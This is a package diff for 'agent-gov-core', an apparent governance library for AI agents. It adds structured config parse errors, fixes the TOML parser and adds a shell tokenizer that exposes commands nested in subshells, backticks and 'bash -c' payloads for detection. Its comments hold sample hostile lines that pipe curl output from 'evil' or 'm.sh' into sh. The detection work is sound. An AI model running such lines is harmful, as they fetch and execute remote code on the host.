+ * message: parseError.message,
20
+ * });
21
+ * }
22
+ */
23
+ export declare class ConfigParseError extends Error {
24
+ readonly line: number;
25
+ readonly column: number;
26
+ readonly rawOffset: number;
27
+ constructor(message: string, opts: {
28
+ line: number;
29
+ column: number;
30
+ rawOffset: number;
31
+ cause?: Error;
32
+ });
33
+ }
34
+ /** Convert a 0-based offset into `text` (a string index, not a UTF-8 byte count) to 1-based line and column. */
35
+ export declare function lineColumnOfOffset(text: string, offset: number): {
36
+ line: number;
37
+ column: number;
38
+ };
39
+ /**
40
+ * Extract a byte offset from a parser error message. Both this library's TOML
41
+ * parser ("at offset N") and Node's `JSON.parse` ("at position N", or a
42
+ * `position` property on newer runtimes) use compatible-enough formats that
43
+ * one helper handles both.
44
+ *
45
+ * Returns `null` when no offset can be recovered — most semantic errors
46
+ * (duplicate-key, table redefinition) don't include one.
47
+ */
48
+ export declare function extractParseOffset(err: Error): number | null;
49
+ /**
50
+ * Wrap an arbitrary parser error into a {@link ConfigParseError} when offset
51
+ * recovery is possible; otherwise return the original error unchanged.
52
+ */
53
+ export declare function toConfigParseError(text: string, err: Error): Error;
54
+ //# sourceMappingURL=parse-error.d.ts.map
@@ -0,0 +1,85 @@
1
+ /**
2
+ * Structured config-file parse error. Carries the 1-based line and column of
3
+ * the failure so consumers can emit a `*.config_syntax_error` Finding pointing
4
+ * at the exact spot without recomputing line numbers from the raw offset.
5
+ *
6
+ * Thrown nowhere directly — instead, {@link readJsonObjectWithSource} and
7
+ * {@link readTomlObject} populate the `parseError` field of their result with
8
+ * this type whenever they can resolve a byte offset from the underlying parser.
9
+ * When the underlying error lacks position info, the original `Error` is
10
+ * preserved unchanged.
11
+ *
12
+ * @example
13
+ * import { readTomlObject, ConfigParseError } from 'agent-gov-core';
14
+ * const { parseError } = readTomlObject('.codex/config.toml');
15
+ * if (parseError instanceof ConfigParseError) {
16
+ * emitFinding({
17
+ * kind: 'policy_mesh.config_syntax_error',
18
+ * location: { file: '.codex/config.toml', line: parseError.line, column: parseError.column },
19
+ * message: parseError.message,
20
+ * });
21
+ * }
22
+ */
23
+ export class ConfigParseError extends Error {
24
+ line;
25
+ column;
26
+ rawOffset;
27
+ constructor(message, opts) {
28
+ super(message);
29
+ this.name = 'ConfigParseError';
30
+ this.line = opts.line;
31
+ this.column = opts.column;
32
+ this.rawOffset = opts.rawOffset;
33
+ if (opts.cause) {
34
+ // Node 16.9+ supports the `cause` option on Error; some runtimes don't.
35
+ this.cause = opts.cause;
36
+ }
37
+ }
38
+ }
39
/**
 * Translate a 0-based offset into `text` into a 1-based line/column pair.
 *
 * The offset is used as a string index and is clamped to `[0, text.length]`,
 * so out-of-range values resolve to the start or the end of the text. Only
 * `'\n'` starts a new line; every other character advances the column.
 *
 * @param text Full source text the offset refers to.
 * @param offset 0-based index into `text`.
 * @returns `{ line, column }`, both 1-based.
 */
export function lineColumnOfOffset(text, offset) {
    const limit = Math.max(0, Math.min(offset, text.length));
    let line = 1;
    // Index of the first character of the line currently being scanned.
    let lineStart = 0;
    let cursor = 0;
    while (cursor < limit) {
        if (text[cursor] === '\n') {
            line += 1;
            lineStart = cursor + 1;
        }
        cursor += 1;
    }
    // Characters consumed since the last newline, shifted to 1-based.
    return { line, column: cursor - lineStart + 1 };
}
55
/**
 * Recover the failure offset reported by a parser error.
 *
 * Two sources are consulted, in this order:
 *   1. the message text, looking for "at offset N" or "at position N"
 *      (case-insensitive);
 *   2. a numeric `position` property on the error object.
 *
 * @param err Error raised by a parser.
 * @returns The offset as a number, or `null` when neither source yields one.
 */
export function extractParseOffset(err) {
    const fromMessage = /at (?:offset|position)\s+(\d+)/i.exec(err.message);
    if (fromMessage !== null) {
        return Number.parseInt(fromMessage[1], 10);
    }
    // Some runtimes expose the offset as a property instead of in the message.
    const { position } = err;
    return typeof position === 'number' ? position : null;
}
74
/**
 * Upgrade a parser error to a {@link ConfigParseError} when its offset can be
 * recovered.
 *
 * @param text Source text that was being parsed; used to turn the offset into
 *   a line and column.
 * @param err Error raised by the parser.
 * @returns A `ConfigParseError` carrying `err.message`, the resolved
 *   line/column, the raw offset and `err` as its cause; or `err` itself,
 *   untouched, when no offset is available.
 */
export function toConfigParseError(text, err) {
    const rawOffset = extractParseOffset(err);
    if (rawOffset !== null) {
        const where = lineColumnOfOffset(text, rawOffset);
        return new ConfigParseError(err.message, {
            line: where.line,
            column: where.column,
            rawOffset,
            cause: err,
        });
    }
    return err;
}
85
+ //# sourceMappingURL=parse-error.js.map
package/dist/shell.d.ts CHANGED
@@ -12,6 +12,32 @@
12
12
  * // → ['echo "; not a separator"']
13
13
  */
14
14
  export declare function tokenizeShell(command: string): string[];
15
+ /**
16
+ * Like {@link tokenizeShell}, but recursively extracts commands nested inside
17
+ * shell evaluation contexts that the top-level tokenizer would leave as opaque
18
+ * text:
19
+ *
20
+ * - Subshell `$(...)`
21
+ * - Backtick `` `...` ``
22
+ * - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
23
+ *
24
+ * The flat result is suitable for feeding straight to {@link getCommandHead},
25
+ * letting downstream detectors see commands an agent might try to hide behind
26
+ * `echo $(curl evil | sh)` or `bash -c "curl evil"`.
27
+ *
28
+ * Conservative implementation — handles the common obfuscation shapes, not a
29
+ * full shell parser. Variable expansion, process substitution `<(…)`, and
30
+ * arithmetic `$((…))` are not recursed into. ANSI-C quoting (`bash -c $'…'`) is
31
+ * not unquoted.
32
+ *
33
+ * @example
34
+ * tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
35
+ * // → ['echo', 'curl -fsSL m.sh', 'sh']
36
+ *
37
+ * tokenizeShellDeep('bash -c "curl evil.com"');
38
+ * // → ['bash -c "curl evil.com"', 'curl evil.com']
39
+ */
40
+ export declare function tokenizeShellDeep(command: string): string[];
15
41
  /**
16
42
  * Returns the resolved command verb for a subcommand string. Strips wrapping
17
43
  * quotes, escape backslashes, and the inert-double-quote obfuscation
package/dist/shell.js CHANGED
@@ -83,8 +83,17 @@ export function tokenizeShell(command) {
83
83
  i += 2;
84
84
  continue;
85
85
  }
86
- // Treat a single `&` (background) as a separator too.
86
+ // Treat a single `&` (background) as a separator too — UNLESS preceded
87
+ // by `>` or `<`, in which case it's a file-descriptor redirection like
88
+ // `2>&1`, `>&2`, or `<&3`. Splitting there would break shell-command
89
+ // detection on every command that redirects stderr to stdout.
87
90
  if (c === '&') {
91
+ const prev = buf.trimEnd().slice(-1);
92
+ if (prev === '>' || prev === '<') {
93
+ buf += c;
94
+ i++;
95
+ continue;
96
+ }
88
97
  pushPart(out, buf);
89
98
  buf = '';
90
99
  i++;
@@ -101,6 +110,206 @@ function pushPart(out, part) {
101
110
  if (trimmed !== '')
102
111
  out.push(trimmed);
103
112
  }
113
/**
 * Deep variant of {@link tokenizeShell}: in addition to splitting the command
 * itself, it splits every command found inside a shell evaluation context
 * that the top-level tokenizer treats as opaque text:
 *
 *   - command substitution `$(...)`
 *   - backtick substitution `` `...` ``
 *   - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` and
 *     similar `-c` payloads
 *
 * The result is one flat, de-duplicated list (first occurrence wins) that can
 * be fed straight to {@link getCommandHead}, so downstream detectors also see
 * commands tucked away in `echo $(curl evil | sh)` or `bash -c "curl evil"`.
 * For each visited string the pieces of the string itself come first,
 * followed by the pieces of its nested payloads in order of appearance.
 *
 * This is deliberately conservative and not a full shell parser. Variable
 * expansion and process substitution `<(…)` are not followed, and ANSI-C
 * quoting (`bash -c $'…'`) is not unquoted. Nesting is followed to a fixed
 * maximum depth.
 *
 * @example
 *   // Includes the pieces of the outer command and those of `curl -fsSL m.sh | sh`.
 *   tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
 *
 *   // Includes the pieces of the outer command and those of `curl evil.com`.
 *   tokenizeShellDeep('bash -c "curl evil.com"');
 *
 * @param command Raw shell command line.
 * @returns Subcommand strings in discovery order, without duplicates.
 */
export function tokenizeShellDeep(command) {
    // Guard against pathological nesting.
    const MAX_DEPTH = 8;
    // A Set keeps insertion order and drops repeats, giving "first seen wins".
    const collected = new Set();
    // Explicit depth-first work list; the next string to visit is on top.
    const pending = [{ text: command, depth: 0 }];
    while (pending.length > 0) {
        const { text, depth } = pending.pop();
        if (depth > MAX_DEPTH) {
            continue;
        }
        // Payloads are taken from the WHOLE string before it is split:
        // `tokenizeShell` splits on `|` regardless of paren depth, so a body
        // such as `$(curl m.sh | sh)` would already be cut in two otherwise.
        const payloads = extractNestedShellPayloads(text);
        for (const piece of tokenizeShell(text)) {
            collected.add(piece);
        }
        // Push in reverse so payloads are visited in their original order.
        for (let k = payloads.length - 1; k >= 0; k--) {
            pending.push({ text: payloads[k], depth: depth + 1 });
        }
    }
    return [...collected];
}
161
/**
 * True when `ch` is a character whose backslash-escaped form must not affect
 * quote tracking: a double quote, a single quote, or a backslash.
 */
function isQuoteOrBackslash(ch) {
    return ch === '"' || ch === "'" || ch === '\\';
}
/**
 * Collect every shell-evaluation payload embedded in `subcommand`:
 *   - the body of each `$(…)` (parenthesis-balanced) and each `` `…` ``;
 *   - the argument that follows `<interpreter> -c`, where the interpreter is
 *     one of bash, sh, zsh, ksh, dash, ash, fish, python, python3, perl, ruby
 *     or node. The argument is returned with its outer quotes removed.
 *
 * Substitutions are looked for outside quotes and inside double quotes (where
 * the shell still evaluates them); single-quoted text is skipped entirely.
 * The `-c` form is only recognised outside double quotes, at the start of the
 * string or directly after whitespace, `;`, `|` or `&`.
 *
 * Quote tracking follows two shell rules so quoted data cannot hide a payload:
 *   - a `'` inside double quotes is a literal apostrophe, not the start of a
 *     single-quoted region (`echo "it's $(cmd)"` still evaluates `cmd`);
 *   - outside single quotes, `\"`, `\'` and `\\` are escaped characters and do
 *     not open or close a quoted region.
 * A backslash in front of `$(` or a backtick is deliberately NOT honoured, so
 * escaped substitutions are still reported (over-approximation).
 *
 * NOTE(review): perl, ruby and node evaluate inline code with `-e`, not `-c`;
 * confirm whether `-e` should be matched for those interpreters.
 *
 * @param subcommand Command text to scan.
 * @returns Payload strings in order of appearance; empty when none are found.
 */
function extractNestedShellPayloads(subcommand) {
    const found = [];
    const len = subcommand.length;
    // Compiled once per call, outside the character walk.
    const dashCMatcher = /^(?:bash|sh|zsh|ksh|dash|ash|fish|python3?|perl|ruby|node)\s+-c\s+/;
    const boundaryChar = /[\s;|&]/;
    let i = 0;
    let inSingle = false;
    let inDouble = false;
    while (i < len) {
        const c = subcommand[i];
        // Single quotes: nothing inside is interpreted, not even backslashes.
        if (inSingle) {
            if (c === "'")
                inSingle = false;
            i++;
            continue;
        }
        // An escaped quote or backslash is data; skip the pair so it cannot
        // flip the quote state.
        if (c === '\\' && isQuoteOrBackslash(subcommand[i + 1])) {
            i += 2;
            continue;
        }
        // A `'` only opens a single-quoted region outside double quotes.
        if (c === "'" && !inDouble) {
            inSingle = true;
            i++;
            continue;
        }
        // Inside double quotes `$(…)` and backticks STILL evaluate, so the
        // walk keeps scanning and merely tracks the state.
        if (c === '"') {
            inDouble = !inDouble;
            i++;
            continue;
        }
        // $(...)
        if (c === '$' && subcommand[i + 1] === '(') {
            const body = readBalanced(subcommand, i + 2, '(', ')');
            if (body !== null) {
                found.push(body.content);
                i = body.endIndex;
                continue;
            }
        }
        // Backticks
        if (c === '`') {
            const close = subcommand.indexOf('`', i + 1);
            if (close !== -1) {
                found.push(subcommand.slice(i + 1, close));
                i = close + 1;
                continue;
            }
        }
        // `bash -c "..."` and friends: checked only outside double quotes so
        // that `echo "bash -c \"curl evil\""` (data, not a command) does not
        // trigger, and only at a word boundary.
        if (!inDouble && (i === 0 || boundaryChar.test(subcommand[i - 1]))) {
            const prefix = dashCMatcher.exec(subcommand.slice(i));
            if (prefix) {
                const afterFlag = i + prefix[0].length;
                const payload = readQuotedArg(subcommand, afterFlag);
                if (payload !== null)
                    found.push(payload);
                // Resume at the argument itself; its quotes are then tracked
                // by the normal walk, so substitutions inside a double-quoted
                // argument are still picked up.
                i = afterFlag;
                continue;
            }
        }
        i++;
    }
    return found;
}
/**
 * Read a balanced `open`/`close` body. `start` is the index just past the
 * opening delimiter. Delimiters inside single or double quotes are ignored;
 * quote tracking uses the same rules as {@link extractNestedShellPayloads}
 * (a `'` inside double quotes is literal, and `\"`, `\'`, `\\` are escapes).
 *
 * @returns `{ content, endIndex }`, where `content` excludes the closing
 *   delimiter and `endIndex` is the index just past it, or `null` when the
 *   body is never closed.
 */
function readBalanced(input, start, open, close) {
    let depth = 1;
    let i = start;
    let inSingle = false;
    let inDouble = false;
    while (i < input.length) {
        const c = input[i];
        if (inSingle) {
            if (c === "'")
                inSingle = false;
            i++;
            continue;
        }
        if (c === '\\' && isQuoteOrBackslash(input[i + 1])) {
            i += 2;
            continue;
        }
        if (c === "'" && !inDouble) {
            inSingle = true;
            i++;
            continue;
        }
        if (c === '"') {
            inDouble = !inDouble;
            i++;
            continue;
        }
        if (!inDouble) {
            if (c === open) {
                depth++;
            }
            else if (c === close) {
                depth--;
                if (depth === 0)
                    return { content: input.slice(start, i), endIndex: i + 1 };
            }
        }
        i++;
    }
    return null;
}
/**
 * Read the next argument starting at `start`, after skipping spaces and tabs.
 *
 * A single- or double-quoted argument is returned without its quotes; inside
 * double quotes a backslash is dropped and the character after it is kept.
 * Anything else is read as a bare token up to the next space or tab.
 *
 * @returns The argument text, or `null` when there is no argument or the
 *   quoted argument is never closed.
 */
function readQuotedArg(input, start) {
    let i = start;
    while (i < input.length && (input[i] === ' ' || input[i] === '\t'))
        i++;
    if (i >= input.length)
        return null;
    const q = input[i];
    if (q !== '"' && q !== "'") {
        // Bare token: read up to whitespace.
        let end = i;
        while (end < input.length && input[end] !== ' ' && input[end] !== '\t')
            end++;
        return input.slice(i, end);
    }
    let buf = '';
    let j = i + 1;
    while (j < input.length) {
        const c = input[j];
        if (c === '\\' && q === '"' && j + 1 < input.length) {
            buf += input[j + 1];
            j += 2;
            continue;
        }
        if (c === q)
            return buf;
        buf += c;
        j++;
    }
    return null;
}
104
313
  /**
105
314
  * Returns the resolved command verb for a subcommand string. Strips wrapping
106
315
  * quotes, escape backslashes, and the inert-double-quote obfuscation
package/dist/toml.js CHANGED
@@ -1,4 +1,5 @@
1
1
  import { readFileSync } from 'node:fs';
2
+ import { toConfigParseError } from './parse-error.js';
2
3
  export function readTomlObject(path) {
3
4
  const text = readFileSync(path, 'utf8');
4
5
  try {
@@ -6,7 +7,7 @@ export function readTomlObject(path) {
6
7
  return { value: parsed, toml: parsed, text };
7
8
  }
8
9
  catch (err) {
9
- return { value: undefined, toml: undefined, text, parseError: err };
10
+ return { value: undefined, toml: undefined, text, parseError: toConfigParseError(text, err) };
10
11
  }
11
12
  }
12
13
  /**
@@ -122,11 +123,11 @@ class TomlParser {
122
123
  // TOML spec violation. Without this guard, `[foo]` silently descended
123
124
  // into the last `[[foo]]` entry and let writes leak into it.
124
125
  if (this.aotPaths.has(path)) {
125
- throw new Error(`Cannot redefine array-of-tables [[${keys.join('.')}]] as a standard table [${keys.join('.')}]`);
126
+ throw new Error(`Cannot redefine array-of-tables [[${keys.join('.')}]] as a standard table [${keys.join('.')}] at offset ${this.pos}`);
126
127
  }
127
128
  const table = this.descendTablePath(keys, /*forHeader*/ true);
128
129
  if (this.definedTables.has(path)) {
129
- throw new Error(`Duplicate table definition: [${keys.join('.')}]`);
130
+ throw new Error(`Duplicate table definition: [${keys.join('.')}] at offset ${this.pos}`);
130
131
  }
131
132
  this.definedTables.add(path);
132
133
  this.current = table;
@@ -153,6 +154,17 @@ class TomlParser {
153
154
  else if (!Array.isArray(arr)) {
154
155
  throw new Error(`Key ${keys.join('.')} is not an array-of-tables`);
155
156
  }
157
+ // Each new array entry resets the "already defined" status of any subtables
158
+ // declared under this AOT path. TOML spec permits the same subtable header
159
+ // (`[fruits.physical]`) to reappear under each fresh `[[fruits]]` entry — it
160
+ // binds to the current array entry. Without this clearing, the v0.4.2
161
+ // definedTables guard rejected the second [fruits.physical] as a duplicate.
162
+ const aotPathPrefix = keys.join(this.PATH_KEY_SEPARATOR) + this.PATH_KEY_SEPARATOR;
163
+ for (const definedPath of this.definedTables) {
164
+ if (definedPath.startsWith(aotPathPrefix)) {
165
+ this.definedTables.delete(definedPath);
166
+ }
167
+ }
156
168
  const newTable = {};
157
169
  arr.push(newTable);
158
170
  this.current = newTable;
@@ -248,7 +260,7 @@ class TomlParser {
248
260
  }
249
261
  const lastKey = keys[keys.length - 1];
250
262
  if (Object.prototype.hasOwnProperty.call(node, lastKey)) {
251
- throw new Error(`Duplicate key: ${keys.join('.')}`);
263
+ throw new Error(`Duplicate key: ${keys.join('.')} at offset ${this.pos}`);
252
264
  }
253
265
  node[lastKey] = value;
254
266
  this.expectLineEnd();
@@ -322,9 +334,18 @@ class TomlParser {
322
334
  const c = this.src[this.pos];
323
335
  if (c === '\\') {
324
336
  this.pos++;
325
- // line-ending backslash: consume to next non-ws line start
326
- const next = this.src[this.pos];
337
+ // Line-ending backslash: per TOML spec, a `\` followed by *any amount
338
+ // of inline whitespace* (spaces/tabs) and then a newline strips the
339
+ // newline and trims leading whitespace on the next line. Peek past
340
+ // trailing inline whitespace before deciding whether this is a
341
+ // line-ending backslash or a regular escape.
342
+ let peek = this.pos;
343
+ while (peek < this.len && (this.src[peek] === ' ' || this.src[peek] === '\t')) {
344
+ peek++;
345
+ }
346
+ const next = this.src[peek];
327
347
  if (next === '\n' || next === '\r' || next === undefined) {
348
+ this.pos = peek;
328
349
  while (this.pos < this.len &&
329
350
  (this.src[this.pos] === ' ' ||
330
351
  this.src[this.pos] === '\t' ||
@@ -480,7 +501,7 @@ class TomlParser {
480
501
  // Without this guard, `{ host = "a", host = "b" }` silently parsed as
481
502
  // `{ host: "b" }` instead of raising.
482
503
  if (Object.prototype.hasOwnProperty.call(node, leaf)) {
483
- throw new Error(`Duplicate key in inline table: ${keys.join('.')}`);
504
+ throw new Error(`Duplicate key in inline table: ${keys.join('.')} at offset ${this.pos}`);
484
505
  }
485
506
  node[leaf] = value;
486
507
  this.skipInlineWhitespace();
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "agent-gov-core",
3
- "version": "0.4.2",
3
+ "version": "0.5.0",
4
4
  "description": "Shared primitives for the AI-agent governance suite: Finding schema, JSONC/TOML readers, line locators, MCP command normalization, shell tokenization, and GitHub Action helpers.",
5
5
  "type": "module",
6
6
  "main": "./dist/index.js",
@@ -41,6 +41,10 @@
41
41
  }
42
42
  },
43
43
  "fingerprint": { "type": "string" },
44
+ "salientKey": {
45
+ "type": "string",
46
+ "description": "Optional discriminator that participates in the fingerprint hash. Set when a single (kind, file, line) site can produce multiple distinct findings (e.g. two suspicious imports on one line). Use a stable value — package name, server name, rule id — not a timestamp."
47
+ },
44
48
  "data": { "type": "object" }
45
49
  }
46
50
  }